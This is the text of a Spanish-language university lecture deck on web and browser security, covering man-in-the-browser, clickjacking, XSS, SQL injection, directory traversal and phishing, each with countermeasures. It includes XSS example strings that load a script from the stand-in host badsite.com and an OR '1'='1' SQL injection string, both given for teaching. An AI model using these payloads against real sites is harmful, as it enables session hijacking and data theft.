La web SEGURIDAD INFORMÁTICAldm/mypage/data/si/apuntes/2019-apunte6.pdf · La web y los usuarios Seguridad Informática Temario Ataques contra navegadores Sitios web falsos y maliciosos

1

SEGURIDAD INFORMÁTICA

UNTDF – IDEI | Profesor Lic. Leonardo de - Matteis | 2019/1c

La web y los usuarios

IDEI | 2019-1c | 2 Universidad Nacional de Tierra del Fuego, Antártida e Islas del Atlántico Sur

Seguridad InformáticaLa web y los usuarios

Temario

Ataques contra navegadores

Sitios web falsos y maliciosos

Ataques dirigidos a datos sensibles

Ataques de inyección de código

Spam (correo no deseado)

Suplantación de identidad (phishing)



Vulnerabilidades en navegadores

Los navegadores se han convertido de muchas maneras en nuestros

nuevos sistemas operativos.

1000

900

800

700

600

500

400

300

200

100

02008 2009 2010 2011 2012 2013

208 207

441

731

897

727



Navegadores

Tipos de ataques:

Man in the browser

Keystroke logger (registrador de teclas pulsadas)

Página en el medio (page in the middle)

Programa de sustitución de descarga.

Usuario en el medio (user in the middle)



Ataques a navegadores: man in the browser

Ejemplo: Win32/Silentbanker.A

Troyano instalado como complemento del navegador. Cuando detectaba que el usuario accedía a una URL bancaria, interceptaba las pulsaciones e incluso las modificaba para que las transferencias de dinero fueran a cuentas de los atacantes. También realizaba capturas de pantallas.

User typesBrowser

encrypts

Encrypted data

transferred to

bank

SilentBanker

intercepts

BANK



Ataques a navegadores: man in the browser

Recomendaciones/limpieza:

“La extracción manual no se recomienda para esta amenaza. Para

detectar y eliminar esta amenaza y otro software malintencionado

que se haya instalado, ejecute un análisis completo del sistema

con un producto antivirus actualizado.”

2



Ataques a navegadores: keystroke logger

Características:

Hardware o software que registra todas las pulsaciones.

Puede ser un dongle pequeño conectado a un puerto USB o

puede hacerse pasar por un teclado.

También se puede instalar como malware.

No se encuentra limitado a afectar navegadores.



Ataques a navegadores: page in the middle

Características:

El usuario se dirige a una página diferente de la que se cree o se

pretende.

Efecto similar al de un hombre en el navegador, donde el

atacante puede interceptar y modificar la entrada del usuario.



Ataques a navegadores: programa de sustitución de descarga

Características:

El atacante crea una página con programas aparentemente

inocuos y deseables para descargar.

En lugar de, o además de, la funcionalidad deseada, el usuario

termina descargando e instalando un malware.

Técnica muy común para el spyware.



Ataques a navegadores: user in the middle

Características:

Uso de click-bait (ciber anzuelos) para engañar a los usuarios

para que resuelvan los CAPTCHA en nombre de los spammers.

Ejemplo: titulares de prensa o propagandas apuntan a explotar

la curiosidad del usuario. Proporcionan información parcial y

suficiente para provocar el seguimiento de un determinado

enlace.



Ataques a navegadores: user in the middle

Características:

Sitios web de CAPTCHA son utilizados para vencer la

automatización.

Ejemplo: para evitar que spammers creen secuencias de

comandos en la creación de masiva de cuentas de en un sitio de

correo electrónico.

Los atacantes pueden derrotar a los CAPTCHA a gran escala.

Diseñando sitios web ficticios para incitar a los usuarios a

resolver CAPTCHA de sistemas de terceros.



Autenticación exitosa

Los ataques enumerados son en gran parte fallos de autenticación.

Se puede mitigar con:

Secreto compartido

Contraseña de una sola vez

Comunicación fuera de banda

Ejemplos: Tokens (SecurID), segundo factor de autenticación

(Google, Microsoft, Facebook, etc.) y códigos de mensajes de texto

(PIN, SMS, etc.). Firma de controladores (drivers).

3



Ataques a sitios web: fake site












Ataques a sitios web: fake code

Sitio de descarga de software destinado a engañar a los usuarios para que descarguen que contienen algún tipo de malware.



Ataques a sitios web: seguimiento (tracking bug)

Una pequeña imagen en un

servidor específico que permite

realizar un seguimiento del

comportamiento del usuario en

muchos sitios web con fines

publicitarios.

Esta técnica también se utiliza

para rastrear la lectura de los

correos electrónicos con

publicidades.

Florist Bakery

Targeted ad

3

21

Visit from 200.100.1.10 Visit from 200.100.1.10

ClicksRUs

Web

bugs

4



Ataques a sitios web: clickjacking

Características:

Forma de engañar a los usuarios para que proporcionen la

información deseada.

Un atacante confecciona un objeto/diálogo de entrada

transparente y coloca una imagen con una incitación debajo de

dicho objeto.

Un usuario termina respondiendo una pregunta que ni siquiera

sabía que se le estaba realizando, entonces autoriza al

programa a ejecutar una acción (según el objetivo/voluntad del

atacante).




Características:

El uso de encuadres: iframes/divs en HTML es un componente

importante utilizado para este tipo ataque.

Do you want to perform

this dangerous act?

[Yes] [No]

For a Free Prize

Click

[Here]




Acciones con las que un usuario no estaría de acuerdo:

¿Realmente quieres borrar todos tus archivos?

¿Realmente quieres instalar este programa?

¿Realmente desea cambiar su contraseña a: AZAZAZ?

¿Realmente desea permitir que cualquiera tenga acceso de

escritura a su perfil?










5



Ataques a sitios web: drive by download

Características:

El código se descarga, instala y ejecuta en un equipo sin el

conocimiento del usuario.

Puede ser el resultado de:

clickjacking,

código falso,

Sustitución en la descarga de programas,

otros.




Ejemplo: barras de herramientas para el navegador no deseadas.




¿limpieza?



Ataques a sitios web: cross site scripting (XSS)

Características:

Engañar a un cliente o servidor para que ejecute código de

scripting.

Inclusión de código en elementos de una página que se utilizan

para ingreso de datos. Usualmente código en Javascript.

Scripts y tags HTML se codifican como texto sin formato al igual

que las entradas del usuario, por lo que pueden controlar

páginas web de la misma manera que los ataques de

desbordamiento de buffer pueden controlar los programas.







Ejemplos:

� Cool<br>story.<br>KCTVBigFan<script

src=http://badsite.com/xss.js></script>

� http://www.google.com/search?name=<SCRIPT

SRC=http://badsite.com/xss.js></SCRIPT>&q=cross+site+s

cripting&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-

US:official&client=firefox-a&lr=lang_en

6







Consecuencias asociadas al uso de código malicioso en un lenguaje

de scripting abarcan el diseño de diferentes tipos de ataques:

Robo cookies asociadas a un sitio web.

Keylogging

Phishing

Hijack de sesiones de usuario.



Ataques a sitios web: inyección de código SQL

Características:

Inyectar código SQL en un intercambio entre una aplicación y su

servidor de base de datos.

Ejemplo:

� QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " '; “

� QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "










7









Ataques a sitios web: dot dot slash (../)

Características:

Conocido como "recorrido de directorios“. Ocurre cuando los

atacantes utilizan los caracteres: "../" para acceder a los

archivos que se encuentran en el servidor web de destino pero

que no están destinados a ser accedidos desde el exterior.

Con mayor frecuencia utilizado vía especificación de URL, pero

también se puede combinar con otros ataques, como XSS.

Ejemplo:



Contramedidas y prevención de ataques de inyección

Filtrar y “limpiar” todos los datos ingresados por el usuario.

Tener en cuenta cada codificación potencialmente válida.

No hacer suposiciones sobre el rango de posibles entradas del

usuario: no confiar en nada, verificar todo.

Utilizar mecanismos de control de acceso en los servidores,

ejemplo: procedimientos almacenados.



Server side include (SSI)

Características:

Lenguaje de scripting interpretado del lado del servidor.

Se puede usar para ejecutar directivas básicas del servidor web,

como incluir archivos y ejecutar comandos.

Algunos sitios web son vulnerables a permitir que los usuarios

ejecuten directivas SSI a través de entrada de texto no

validadas o revisadas en forma correcta.

Ejemplo:



Contramedidas para prevenir ataques de inyección de código

Filtrar y sanear todas las entradas que pueda proveer un

usuario.

Necesidad de tener en cuenta cada codificación de texto

potencialmente válida.

No realizar suposiciones sobre el rango de posibles entradas. No

confiar en nada. Verificar absolutamente todo.

Utilizar mecanismos de control de acceso en los programas que

deben ejecutarse del lado del servidor (backend). Ejemplo:

procedimientos almacenados.

8



Correo electrónico no deseado

Se estima que del 60% al 90% de todo el correo electrónico es

spam.

Tipos de spam:

Ofertas y publicidad de diversos productos.

Suplantación de identidad (phishing).

Solicitudes de ayuda.

Código malicioso.

Enlaces a sitios desde donde se descargará malware.



Correo electrónico no deseado

Contramedidas:

Filtros de correo electrónico suelen ser efectivos para la gran

mayoría del spam recibido.

Los proveedores de servicios de Internet establecen limitaciones

de volumen y tamaño para dificultar el trabajo de spammers.

Existen leyes contra el spam, pero en general son ineficaces.



Correo electrónico no deseado: phishing

Características:

Mensaje que trata de engañar a una víctima para que brinde

información privada o sea inducida a realizar una acción

insegura.

Pueden definirse ataques dirigidos y personalizados a ciertos

destinatarios con características determinadas. Ejemplo: spear

phishing.










9







Contramedidas:

Educación de los usuarios:

Desventaja: efectividad limitada y muy sujeta a la evolución y

efectividad de los engaños.

PGP y S/MIME:

Soluciones criptográficas. De baja adopción después de años en

el mercado.



Resumen

Los navegadores son una herramienta de trabajo esencial para

los usuarios, por lo tanto son uno de los objetivos más

importantes para diversos tipos de ataques.

Las debilidades de los navegadores y sitios web a menudo son

el resultado de algún tipo de autenticación deficiente.

Los atacantes se enfocan en engañar a los usuarios con sitios

web falsos, aplicaciones engañosas y correos electrónicos para

concretar ataques suplantación de identidad (phishing).

Del lado del servidor los ataques de inyección son un aspecto

clave a tener en cuenta y las medidas para prevenirlos son

críticas.

Documents

La web SEGURIDAD INFORMÁTICAldm/mypage/data/si/apuntes/2019-apunte6.pdf · La web y los usuarios Seguridad Informática Temario Ataques contra navegadores Sitios web falsos y maliciosos